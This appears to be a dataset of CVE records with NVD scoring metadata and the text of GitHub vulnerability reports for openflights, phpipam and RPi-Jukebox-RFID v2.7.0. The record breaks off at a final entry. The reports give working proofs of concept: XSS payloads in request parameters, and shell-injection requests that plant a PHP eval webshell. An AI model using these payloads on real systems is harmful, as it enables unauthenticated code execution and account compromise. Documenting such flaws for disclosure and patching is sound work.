Hello, I would like to report for a xss vulnerability in openflights. The path of the vulnerability. In file https://github.com/jpatokal/openflights/blob/master/php/settings.php ``` $type = $_POST["type"]; //Line 6 ... die("0;" . sprintf(_("Unknown action %s"), $type)); //Line 60 ``` We see that there is no check between the input $_POST["type"] and the output(Line 60) Thus the XSS will happen at `die("0;" . sprintf(_("Unknown action %s"), $type));` Poc: POST `type=<script>alert('xss')</script>` Manual verification: ![1](https://github.com/jpatokal/openflights/assets/134520528/8bdd5057-8ce3-46c7-b95b-321eef7ff08f) ![2](https://github.com/jpatokal/openflights/assets/134520528/9d6d191e-e253-4bfb-b28e-10f51feb9ba8)
XSS vulnerability_1
https://api.github.com/repos/jpatokal/openflights/issues/1477/comments
3
2024-07-09T03:10:14Z
2024-08-22T11:54:31Z
https://github.com/jpatokal/openflights/issues/1477
2,396,998,856
1,477
6,236
CVE-2024-41348
2024-08-29T20:15:08.667
openflights commit 5234b5b is vulnerable to Cross-Site Scripting (XSS) via php/alsearch.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jpatokal/openflights/issues/1478" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpatokal:openflights:2024-08-20:*:*:*:*:*:*:*", "matchCriteriaId": "DDD7A74D-22DA-4AB3-A155-268E6FE10A96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jpatokal/openflights/issues/1478
[ "Exploit", "Issue Tracking" ]
github.com
[ "jpatokal", "openflights" ]
Hello, I would like to report for multiple XSS vulnerabilities in openflights. The path of the vulnerability. In file https://github.com/jpatokal/openflights/blob/master/php/alsearch.php A total of three XSS vulnerabilities were found, one of which did not require any permissions and two required normal user permissions. # XSS1(No permissions required) ``` $offset = $_POST["offset"]; // Line 22 $action = $_POST["action"]; // Line 25 if ($action == "RECORD") { // Line 29 ... exit; } $sth = $dbh->prepare($sql . " LIMIT 10 OFFSET " . $offset); // Line 235 if (!$sth->execute($filterParams)) { die('0;' . sprintf(_('Operation %s failed.'), $action)); // Line 237 } ``` We see that there is no check between the input and output. In Line 22 and Line 25, user input from `$_POST["offset"] ` and `$_POST["action"]` ,and then the requirement that `$action` is not equal to `RECORD` needs to be satisfied(Line 29). Then we want to cause error in Line 235 so that we can execute Line 237, which outputs the $action resulting in XSS. So,the Poc: POST `offset='test&action=<script>alert('xss')</script>` Manual verification: ![3](https://github.com/jpatokal/openflights/assets/134520528/7b9444ba-1d52-4f3e-adcd-d82c1212e889) ![4](https://github.com/jpatokal/openflights/assets/134520528/6771cb1f-305c-4cb3-a250-323e7de80209) # XSS2(need normal user permissions) ``` $name = $_POST["name"]; // Line 8 $action = $_POST["action"]; // Line 25 $uid = $_SESSION["uid"] ?? null; // Line 28 if ($action == "RECORD") { // Line 29 if (!$uid || empty($uid)) { // Line 30 printf("0;" . _("Your session has timed out, please log in again.")); exit; } ... $sql = "SELECT * FROM airlines WHERE mode = ? AND (name LIKE ? OR alias LIKE ?)"; $params = [$mode, $name, $name]; $sth = $dbh->prepare($sql); $row = $sth->fetch(); if ($row) { printf("0;" . sprintf( _("A %s using the name or alias %s exists already."), MODES_OPERATOR[$mode], $name // Line 55 )); exit; } ... } ``` We see that there is no check between the input and output. In Line 8 and Line 25, user input from `$_POST["name"] ` and `$_POST["action"]` ,and then the requirement that `$action` is equal to `RECORD` needs to be satisfied(Line 29). On line 30, the login status is checked. Finally, Line 55 will print $name, resulting in XSS. So,the Poc: First, visit http://cmstest.openflights.com/php/login.php to login.(This url is built locally to access the actual login page depending on the situation). POST `action=RECORD&name=<script>alert('xss')</script>` Manual verification: ![5](https://github.com/jpatokal/openflights/assets/134520528/2d52bb39-d479-43cb-a0dc-f93dcf7b5714) ![6](https://github.com/jpatokal/openflights/assets/134520528/c8970afa-a51d-41da-b806-7d7b52356479) # XSS3(need normal user permissions) ``` $name = $_POST["name"]; // Line 8 $alias = $_POST["alias"]; // Line 9 $action = $_POST["action"]; // Line 25 $uid = $_SESSION["uid"] ?? null; // Line 28 if ($action == "RECORD") { // Line 29 if (!$uid || empty($uid)) { // Line 30 printf("0;" . _("Your session has timed out, please log in again.")); exit; } ... $sql = "SELECT * FROM airlines WHERE mode = ? AND (name LIKE ? OR alias LIKE ?)"; $params = [$mode, $name, $alias]; $sth = $dbh->prepare($sql); $row = $sth->fetch(); if ($row) { printf("0;" . sprintf( _("A %s using the name or alias %s exists already."), MODES_OPERATOR[$mode], $alias // Line 79 )); exit; } } ... } ``` We see that there is no check between the input and output. In Line 8, Line 9 and Line 25, user input from `$_POST["name"] `, `$_POST["alias"] ` and `$_POST["action"]` ,and then the requirement that `$action` is equal to `RECORD` needs to be satisfied(Line 29). On line 30, the login status is checked. Finally, Line 79 will print $alias, resulting in XSS. So,the Poc: First, visit http://cmstest.openflights.com/php/login.php to login.(This url is built locally to access the actual login page depending on the situation). POST `name=test&action=RECORD&alias=<script>alert('xss')</script>` Manual verification: ![微信截图_20240709111337](https://github.com/jpatokal/openflights/assets/134520528/5e01710c-a171-47a2-a524-8d8fbf5b1fbf) ![8](https://github.com/jpatokal/openflights/assets/134520528/803280ed-2f89-4eb7-bf5c-03eca7b14c79)
multiple XSS vulnerabilities_2
https://api.github.com/repos/jpatokal/openflights/issues/1478/comments
1
2024-07-09T03:14:25Z
2024-08-22T13:11:49Z
https://github.com/jpatokal/openflights/issues/1478
2,397,003,191
1,478
6,237
CVE-2024-41358
2024-08-29T20:15:08.873
phpipam 1.6 is vulnerable to Cross Site Scripting (XSS) via app\admin\import-export\import-load-data.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/phpipam/phpipam/issues/4148" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "76AB84E7-3B77-4A35-B047-7DE3D2D77950", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpipam/phpipam/issues/4148
[ "Exploit", "Issue Tracking" ]
github.com
[ "phpipam", "phpipam" ]
Hello, I would like to report for multiple XSS vulnerabilities in phpipam-1.6. The source come from file: app\admin\import-export\import-load-data.php The sink in: app\admin\import-export\import-devices-preview.php(**Other files include import-load-data.php are also vulnerable**) # XSS1 ```php # import-load-data.php $expfields = pf_explode("|",$_GET['expfields']); // Line 18 (Source) ... if (!isset($_GET['filetype'])) { exit; } // Line20-23 (Check point) ... $impfield = $_GET['importFields__'.str_replace(" ", "_",trim($expfield))]; // Line 35 (Check point) ... $hrow.="<th>".$expfield."</th>"; // Line 45 (tainted passed) # import-devices-preview.php print "<tr class='active'>".$hrow."<th>"._("Action")."</th></tr>"; // Line 52 (sink) ``` In file import-load-data.php, source from Line18($_GET['expfields']). And then check point in Line20-23,which we should set `$_GET['filetype']` to bypass. Next, another check point in Line 35, which we should set `$_GET['importFields__'.str_replace(" ", "_",trim($expfield))]`. After bypass two check point, the source(tainted) pass to `$hrow` and finally print in import-devices-preview.php(Line 52) without another check. ## Poc `GET /app/admin/import-export/import-devices-preview.php?filetype=text&expfields=%3cscript%3ealert(1)%3c%2fscript%3e&importFields__%3cscript%3ealert(1)%3c%2fscript%3e=test ` ## Manual verification ![7](https://github.com/phpipam/phpipam/assets/134520528/a9a7b87c-dac0-48a8-b6d5-cd0cca48b872) ![8](https://github.com/phpipam/phpipam/assets/134520528/46f80b42-d1b9-4f8f-9711-4b1403e25db8) # XSS2 ```php # import-load-data.php $expfields = pf_explode("|",$_GET['expfields']); // Line 18 (Source) ... if (!isset($_GET['filetype'])) { exit; } // Line20-23 (Check point) ... $impfield = $_GET['importFields__'.str_replace(" ", "_",trim($expfield))]; // Line 35 (Check point) ... $hiddenfields.="<input name='importFields__".str_replace(" ", "_",trim($expfield))."' type='hidden' value='".$impfield."' style='display:none;'>"; // Line 47 (tainted passed) # import-devices-preview.php print $hiddenfields; //Line 47 (sink) ``` The difference between xss1 and xss2 is that sink point, the source(tainted) pass to `$hiddenfields ` and finally print in import-devices-preview.php(Line 47) without another check. ## Poc `GET /app/admin/import-export/import-devices-preview.php?filetype=text&expfields=1%27type%3d%27text%27style%3d%27display%3ablock%27onclick%3d%27alert(123)&importFields__1%27type%3d%27text%27style%3d%27display%3ablock%27onclick%3d%27alert(123)=test ` ## Manual verification <img width="990" alt="9" src="https://github.com/phpipam/phpipam/assets/134520528/490cb820-bbd8-43fd-ad3f-ae726edb0265"> <img width="985" alt="10" src="https://github.com/phpipam/phpipam/assets/134520528/72dda211-660e-4ec8-b4a2-fcb7c66afe5f"> ![11](https://github.com/phpipam/phpipam/assets/134520528/dad4fa5b-234f-4d81-ad46-dfa41ad8ea78) # XSS3 ```php # import-load-data.php $expfields = pf_explode("|",$_GET['expfields']); // Line 18 (Source) $reqfields = pf_explode("|",$_GET['reqfields']); // Line 19 ... $impfield = $_GET['importFields__'.str_replace(" ", "_",trim($expfield))]; if (in_array($expfield,$reqfields) && ($impfield == "-")) { // Line 36(check point) $Result->show('danger', _("Error: missing required field mapping for expected field")." <b>".$expfield."</b>."._("Please check field matching in previous window."), true, true); // Line 37 (sink) } ``` xss3 is different from both xss2 and xss1 because the error message contains the source(Line 37), and we trigger the error by satisfying the requirements of the checkpoint, thus triggering the XSS. So Let `$expfield==$reqfields` and `$_GET['importFields__'.str_replace(" ", "_",trim($expfield))]=-` ## Poc `GET /app/admin/import-export/import-devices-preview.php?filetype=text&expfields=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&importFields__%3cscript%3ealert(%27xss%27)%3c%2fscript%3e=-&reqfields=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e ` ## Manual verification ![13](https://github.com/phpipam/phpipam/assets/134520528/0df15d92-81c4-4437-b6f8-d534665bd113) ![14](https://github.com/phpipam/phpipam/assets/134520528/4645e3e8-1916-4270-bf4f-b2e846947dd4) # XSS4 ```php # import-load-data.php $expfields = pf_explode("|",$_GET['expfields']); // Line 18 (Source) ... if (!isset($_GET['filetype'])) { exit; } // Line20-23 (Check point) ... $impfield = $_GET['importFields__'.str_replace(" ", "_",trim($expfield))]; // Line 35 (Check point) ... $hiddenfields.="<input name='importFields__".str_replace(" ", "_",trim($expfield))."' type='hidden' value='".$impfield."' style='display:none;'>"; // Line 47 (tainted passed) # import-devices-preview.php print $hiddenfields; //Line 47 (sink) ``` XSS4 is basically the same as XX2 except that the sink we use is `$impfield` in Line 47 ## Poc `GET /app/admin/import-export/import-devices-preview.php?filetype=text&expfields=1&importFields__1=1%27style%3d%27display%3ablock%27accesskey%3d%27X%27onclick%3d%27alert(123) ` ## Manual verification <img width="607" alt="15" src="https://github.com/phpipam/phpipam/assets/134520528/e176dee3-3654-4c35-9796-cdc54e41ae34"> ![16](https://github.com/phpipam/phpipam/assets/134520528/ad742dee-3b54-4dff-8835-c45e1ee44175)
xss_4
https://api.github.com/repos/phpipam/phpipam/issues/4148/comments
0
2024-07-11T03:23:15Z
2024-07-15T20:35:45Z
https://github.com/phpipam/phpipam/issues/4148
2,402,156,061
4,148
6,238
CVE-2024-41361
2024-08-29T20:15:08.953
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2398" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sourcefabric:phoniebox:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D8F3672-D6B8-4655-908F-417A730F8081", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2398
[ "Exploit", "Issue Tracking" ]
github.com
[ "MiczFlor", "RPi-Jukebox-RFID" ]
### Version v2.7.0 ### Branch released ### OS ubuntu 22 ### Pi model unknown ### Hardware _No response_ ### What happened? Hello, I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(**No permissions required**) # Analysis The path of the vulnerability: htdocs\manageFilesFolders.php ```php if( // Line 90(Check point) isset($post['folder']) && $post['folder'] != "" && file_exists($post['folder']) && is_dir($post['folder']) ) { $moveFolder = $post['folder']; // Line 97(Source) } else { $moveFolder = $Audio_Folders_Path; } if ( isset($post['folderNew']) && $post['folderNew'] != "" ) { $moveFolder = $moveFolder . "/" . $post['folderNew']; //Line 110(Source) if(!file_exists($Audio_Folders_Path . "/" . $moveFolder)) { $exec = 'mkdir "' . $moveFolder . '"; chown -R pi:www-data "' . $moveFolder . '"; sudo chmod -R 777 "' . $moveFolder . '"'; exec($exec); // Line 115(Sink) } } ``` Source from Line 97 (`$_POST['folder']`) and Line 110(`$post['folderNew']`). And then there is a check point(Line 90) ,which we should set `$_POST['folder'] = 2` to bypass. After bypass the check point, the source(tainted) pass to `$exec` and `exec($exec);`(Line 115) without another check. # Poc `POST /htdocs/manageFilesFolders.php ` Data: `ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello` Here is the version without url encoding for ease of understanding: `ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell3.php ; echo "hello` # Manual verification ![5](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/083593ad-aa80-4024-9616-4f05132e8fc3) ![6](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/36f2be45-70f0-4e21-a11b-cad5e4692906) The attacker can then easily connect to this webshell(/htdocs/shell3.php) ### Logs _No response_ ### Configuration _No response_ ### More info _No response_
🐛 | RPi-Jukebox-RFID V2.7_RCE_3
https://api.github.com/repos/MiczFlor/RPi-Jukebox-RFID/issues/2398/comments
1
2024-07-11T17:29:36Z
2024-07-12T04:51:34Z
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2398
2,403,698,934
2,398
6,239
CVE-2024-41364
2024-08-29T20:15:09.033
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2400" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sourcefabric:phoniebox:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D8F3672-D6B8-4655-908F-417A730F8081", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2400
[ "Exploit", "Issue Tracking" ]
github.com
[ "MiczFlor", "RPi-Jukebox-RFID" ]
### Version v2.7.0 ### Branch released ### OS ubuntu 22 ### Pi model unknown ### Hardware _No response_ ### What happened? Hello, I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(**No permissions required**) # Analysis The path of the vulnerability: htdocs\trackEdit.php ```php if($_POST['ACTION'] == "trackDelete") { // Line 232 (CheckPoint) if($_POST['deleteTrack'] == "yes") { // Line 233 (CheckPoint) $exec = 'sudo rm "'.$post['folder'].'/'.$post['filename'].'"'; // Line 235 (Source) exec($exec); // Line 236 (Sink) ``` Source from Line 235 (`$_POST['folder']` and `$_POST['filename']` ) . And then there are two check point(Line 232 and Line 233) ,which we should set `$_POST['ACTION'] = trackDelete` and `$_POST['deleteTrack'] = yes` to bypass. After bypass two check point, the source(tainted) pass to `$exec` and `exec($exec);`(Line 236) without another check. # Poc `POST /htdocs/trackEdit.php ` Data: `ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22` Here is the version without url encoding for ease of understanding: `ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell5.php ;&filename=1"` # Manual verification ![9](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/0ea6895a-dcfd-42a8-b1ac-15545e0d3a84) ![10](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/a957f161-5dfe-4a5c-bf98-ad83226210f2) The attacker can then easily connect to this webshell(/htdocs/shell5.php) ### Logs _No response_ ### Configuration _No response_ ### More info _No response_
🐛 | RPi-Jukebox-RFID V2.7_RCE_5
https://api.github.com/repos/MiczFlor/RPi-Jukebox-RFID/issues/2400/comments
1
2024-07-11T17:29:42Z
2024-07-12T04:57:33Z
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2400
2,403,699,086
2,400
6,240
CVE-2024-41366
2024-08-29T20:15:09.113
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2399" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sourcefabric:phoniebox:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D8F3672-D6B8-4655-908F-417A730F8081", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2399
[ "Exploit", "Issue Tracking" ]
github.com
[ "MiczFlor", "RPi-Jukebox-RFID" ]
### Version v2.7.0 ### Branch released ### OS ubuntu 22 ### Pi model unknown ### Hardware _No response_ ### What happened? Hello, I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(**No permissions required**) # Analysis The path of the vulnerability: htdocs\userScripts.php ```php $post['filename'] = $_POST['filename']; //Line 46 (Source) if($_POST['ACTION'] == "userScript") { // Line 62 (Check point) $messageAction.="Executed'sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew']."'"; // Line 64 (Tainted) $exec="sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew']; // Line 67 (Tainted) exec($exec); // Line 68(Sink) } ``` Source from Line 46 (`$_POST['filename']`) . And then there is a check point(Line 62) ,which we should set `$_POST['ACTION'] = userScript` to bypass. After bypass the check point, the source(tainted) pass to `$exec` and `exec($exec);`(Line 68) without another check. # Poc `POST /htdocs/userScripts.php ` Data: `ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22` Here is the version without url encoding for ease of understanding: `ACTION=userScript&folder=hello ; echo "<?php @eval($_POST['pass']) ?>" > ./shell4.php ;&folderNew=echo "hello"` # Manual verification ![7](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/a56b2101-246b-4fa2-90f8-112909f6c542) ![8](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/55b081fd-21be-4acf-b337-3774a00c9ee5) The attacker can then easily connect to this webshell(/htdocs/shell4.php) ### Logs _No response_ ### Configuration _No response_ ### More info _No response_
🐛 | RPi-Jukebox-RFID V2.7_RCE_4
https://api.github.com/repos/MiczFlor/RPi-Jukebox-RFID/issues/2399/comments
1
2024-07-11T17:29:39Z
2024-07-12T04:54:46Z
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2399
2,403,699,035
2,399
6,241
CVE-2024-41367
2024-08-29T20:15:09.193
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\api\playlist\appendFileToPlaylist.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2397" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sourcefabric:phoniebox:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D8F3672-D6B8-4655-908F-417A730F8081", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2397
[ "Exploit", "Issue Tracking" ]
github.com
[ "MiczFlor", "RPi-Jukebox-RFID" ]
### Version v2.7.0 ### Branch released ### OS ubuntu 22 ### Pi model unknown ### Hardware _No response_ ### What happened? Hello, I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(**No permissions required**) # Analysis The path of the vulnerability: htdocs\api\playlist\appendFileToPlaylist.php ```php # htdocs\api\playlist\appendFileToPlaylist.php $file = $_GET["file"]; // Line 26(Source) if ($file !== "") { print "Playing file " . $file; execScriptWithoutCheck("playout_controls.sh -c=playlistappend -v='$file'"); // Line 29(Sink) } # htdocs\api\common.php exec("sudo ".$absoluteCommand); // Line 25 (Sink) ``` Source from Line 26 (`$_GET['file']`). And then there are no check point. Finally, the source(tainted) pass to `exec("sudo ".$absoluteCommand);`(Line 25 in htdocs\api\common.php) without another check. # Poc `GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello ` Here is the version without url encoding for ease of understanding: `GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval($_POST['pass']) ?>" > ./shell2.php ; echo 'hello` # Manual verification ![3](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/072f431b-4a7e-4ea3-ae8a-5db60aad7f1b) ![4](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/03bbf124-31d7-4176-8fd0-ee62a406f6e1) The attacker can then easily connect to this webshell(/htdocs/api/playlist/shell2.php) ### Logs _No response_ ### Configuration _No response_ ### More info _No response_
🐛 | RPi-Jukebox-RFID V2.7_RCE_2
https://api.github.com/repos/MiczFlor/RPi-Jukebox-RFID/issues/2397/comments
1
2024-07-11T17:29:34Z
2024-07-12T04:47:33Z
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2397
2,403,698,874
2,397
6,242
CVE-2024-41368
2024-08-29T20:15:09.277
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWlanIpMail.php
